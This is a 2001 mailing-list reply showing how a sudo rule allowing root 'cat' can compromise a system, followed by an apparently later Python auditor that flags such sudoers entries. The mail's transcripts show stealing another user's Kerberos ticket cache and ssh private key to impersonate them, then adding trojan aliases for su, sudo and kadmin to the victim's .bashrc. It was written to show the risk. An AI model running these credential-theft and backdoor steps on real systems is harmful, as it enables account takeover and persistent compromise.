
Re: shared root account



On Sat, Jul 07, 2001 at 02:10:09AM +0100, Eric E Moore wrote:
[cut]
> I would be very shocked if you could compromise a system with a
> sudoers entry of:
> me hostname = (root) /bin/cat

Depends on what's on the system. I've thought of four similar ways.


1:

With Kerberos, you can steal someone's ticket-granting ticket and use it
until it expires. My example also uses AFS:

| test@pentagram:~$ klist
| Ticket cache: FILE:/tmp/krb5cc_q5bOCp
| Default principal: test@G6NET.COM
| 
| Valid starting     Expires            Service principal
| 07/06/01 22:29:11  07/07/01 08:29:11  host/pentagram.g6net.com@G6NET.COM
| 07/06/01 22:29:11  07/07/01 08:29:11  krbtgt/G6NET.COM@G6NET.COM
| 07/06/01 22:29:11  07/07/01 08:29:11  afs/g6net.com@G6NET.COM
| 
| 
| Kerberos 4 ticket cache: /tmp/tkt1001
| klist: You have no tickets cached
| test@pentagram:~$ cd /tmp
| test@pentagram:/tmp$ ls -al
| total 20
| drwxrwxrwt    3 root     root         1024 Jul  6 22:29 .
| drwxr-xr-x   21 root     root         1024 Jun 27 23:41 ..
| -rw-------    1 waoki    waoki         892 Jul  6 01:40 krb5cc_1002
| -rw-------    1 waoki    waoki         848 Jul  6 22:22 krb5cc_GMJQN9
| -rw-------    1 test     test          885 Jul  6 22:28 krb5cc_SyJR0W
| -rw-------    1 test     test          885 Jul  6 22:26 krb5cc_YzLI0R
| -rw-------    1 test     test         1243 Jul  6 22:29 krb5cc_q5bOCp
| drwxr-xr-x    2 root     root        12288 Nov 14  2000 lost+found
| test@pentagram:/tmp$ ls -al /afs/g6net.com/user/waoki/secure
| ls: /afs/g6net.com/user/waoki/secure: Permission denied
| test@pentagram:/afs/g6net.com/user/waoki$ touch /afs/g6net.com/user/waoki/afile
| touch: creating `/afs/g6net.com/user/waoki/afile': Permission denied

Nope, can't access someone else's homedir...

| test@pentagram:/tmp$ sudo -v
| 
| We trust you have received the usual lecture from the local System
| Administrator. It usually boils down to these two things:
| 
|         #1) Respect the privacy of others.
|         #2) Think before you type.
| 
| Password for test@G6NET.COM: 

Now we steal a TGT (but we could also go after the keytab)...

| test@pentagram:/tmp$ sudo /bin/cat krb5cc_GMJQN9 > krb5cc_q5bOCp 
| test@pentagram:/tmp$ aklog

...and now I'm someone else!

| test@pentagram:/tmp$ klist
| Ticket cache: FILE:/tmp/krb5cc_q5bOCp
| Default principal: waoki@G6NET.COM
| 
| Valid starting     Expires            Service principal
| 07/06/01 22:21:56  07/07/01 08:21:52  krbtgt/G6NET.COM@G6NET.COM
| 07/06/01 22:22:03  07/07/01 08:21:52  afs/g6net.com@G6NET.COM
| 
| 
| Kerberos 4 ticket cache: /tmp/tkt1001
| klist: You have no tickets cached
| 
| test@pentagram:/tmp$ ls -al /afs/g6net.com/user/waoki/secure
| total 4
| drwxr-xr-x    2 waoki    waoki        2048 Jul  6 01:39 .
| drwxr-xr-x    5 waoki    waoki        2048 Jul  6 22:33 ..
| -rw-r--r--    1 waoki    waoki           0 Jul  6 01:39 file

(As an aside, although the 'secure' directory above is mode 755, it's
on AFS, so the Unix mode bits don't apply.)

Now let's set up some trojans:

| test@pentagram:/tmp$ cp ~/.su.trojan ~/.sudo.trojan ~/.kadmin.trojan /afs/g6net.com/user/waoki/
| test@pentagram:/tmp$ echo alias su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias /bin/su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias sudo=~/.sudo.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias /usr/bin/sudo=~/.sudo.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias kadmin=~/.kadmin.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias /usr/sbin/kadmin=~/.kadmin.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$


2:

Something similar could be done if someone's ssh identity or id_dsa keys
aren't password protected:

| [test@tertia test]$ sudo cat /home/waoki/.ssh/id_dsa > .ssh/id_dsa
| [test@tertia test]$ ssh localhost -l waoki

and now I can trojan apps, or (since the default Debian sudo uses one
timestamp file per user, instead of one per user per tty) I can wait
for the victim to sudo, and then sudo without entering his password.


3 and 4:

If the system's running Samba, access to /etc/smbpasswd lets me log in
to Samba as anyone who appears in /etc/smbpasswd. If the system is using
Netatalk with randnum authentication, users' AppleTalk passwords will
be stored in plaintext in ~/.passwd. Once again, I can trojan binaries
and scripts.


Oh, and catting /proc/kcore could yield interesting information.

-- 
William Aoki                waoki@umnh.utah.edu           (801)-(58)5-1924
UMNH Computer Support          Room 001, GTB              (801)-(58)1-6928
1390 E President's Circle   Salt Lake City, Utah                84112-0050
Key 199D8C7B Fingerprint 3B0A 6800 8A1A 78A7 9A26 BB92 6329 2D3E 199D 8C7B
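The entry quoted at the top of the mail (`me hostname = (root) /bin/cat`) is the kind of thing a sudoers audit should catch: a pager or `cat` run as root with no fixed arguments is an unrestricted file read, and that is what every one of the four scenarios above starts from. The following is an added example, not code from the mail or from the sudo project. It is a small auditor for a subset of the sudoers grammar (per-user entries with an optional `(runas)` and comma-separated commands, plus `Defaults` lines; aliases and `#include` are not expanded). The set of "file reader" binaries and the constructed sample sudoers are assumptions of the example; `tty_tickets` is a real sudoers option, which modern sudo enables by default, so the check is aimed at configurations that explicitly turn it off.

```python
"""Audit a sudoers fragment for entries that amount to arbitrary file read.

Added example, not from the original mail.  Handles only a subset of the
sudoers grammar:
    user host = (runas) [NOPASSWD:] /path/cmd [args], /path/cmd2 ...
    Defaults [!]option, ...
Aliases, Cmnd_Alias and #include are not expanded.
"""
import re
from dataclasses import dataclass, field

# Binaries whose job is to copy a file to stdout.  Run as root without
# fixed arguments they read any file on the box.  (Assumed list.)
FILE_READERS = {"cat", "head", "tail", "less", "more", "tac", "nl"}

_ENTRY_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?P<rhs>.+)$")
_RUNAS_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<rest>.*)$")
_TAG_RE = re.compile(r"^(?:[A-Z]+:\s*)+")      # NOPASSWD:, NOEXEC:, ...


@dataclass
class Finding:
    user: str
    host: str
    runas: str
    command: str
    reason: str


@dataclass
class AuditResult:
    findings: list = field(default_factory=list)
    tty_tickets: str = "unset"   # "on", "off" or "unset" in this file


def audit_sudoers(text: str) -> AuditResult:
    result = AuditResult()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments
        if not line:
            continue
        if line.startswith("Defaults"):
            opts = line[len("Defaults"):].strip()
            for opt in (o.strip() for o in opts.split(",")):
                if opt == "tty_tickets":
                    result.tty_tickets = "on"
                elif opt == "!tty_tickets":
                    result.tty_tickets = "off"
            continue
        m = _ENTRY_RE.match(line)
        if not m:
            continue
        user, host, rhs = m.group("user"), m.group("host"), m.group("rhs")
        runas = "root"                              # sudo's default target
        rm = _RUNAS_RE.match(rhs)
        if rm:
            # "(user:group)" -> keep the user part only
            runas = rm.group("runas").split(":")[0].strip() or "root"
            rhs = rm.group("rest")
        for spec in rhs.split(","):
            spec = _TAG_RE.sub("", spec.strip())
            if not spec:
                continue
            words = spec.split()
            name = words[0].rsplit("/", 1)[-1]
            if words[0] == "ALL":
                result.findings.append(
                    Finding(user, host, runas, spec, "any command as " + runas))
            elif name in FILE_READERS and len(words) == 1:
                result.findings.append(Finding(
                    user, host, runas, spec,
                    f"{name} as {runas}: unrestricted file read"))
            elif name in FILE_READERS and any("*" in w for w in words[1:]):
                result.findings.append(Finding(
                    user, host, runas, spec,
                    f"{name} as {runas}: wildcard arguments"))
    return result


# Constructed sample, modelled on the entry quoted in the mail.
SAMPLE_SUDOERS = """\
Defaults        !tty_tickets
me      pentagram = (root) /bin/cat
ops     ALL = (root) NOPASSWD: /usr/bin/tail /var/log/syslog
backup  ALL = (root) /bin/tar, /bin/cat /var/log/*
test    ALL = (waoki) /bin/cat
admin   ALL = (ALL) ALL
"""

if __name__ == "__main__":
    report = audit_sudoers(SAMPLE_SUDOERS)
    print(f"tty_tickets: {report.tty_tickets}")
    for f in report.findings:
        print(f"{f.user}@{f.host}: {f.command!r} -> {f.reason}")
```

On the sample, the `ops` entry is not reported because `tail` is pinned to one path (sudo matches arguments literally), while the `test` entry is reported even though it runs as `waoki` rather than root: reading another user's ticket cache or `id_dsa` is exactly the second scenario in the mail.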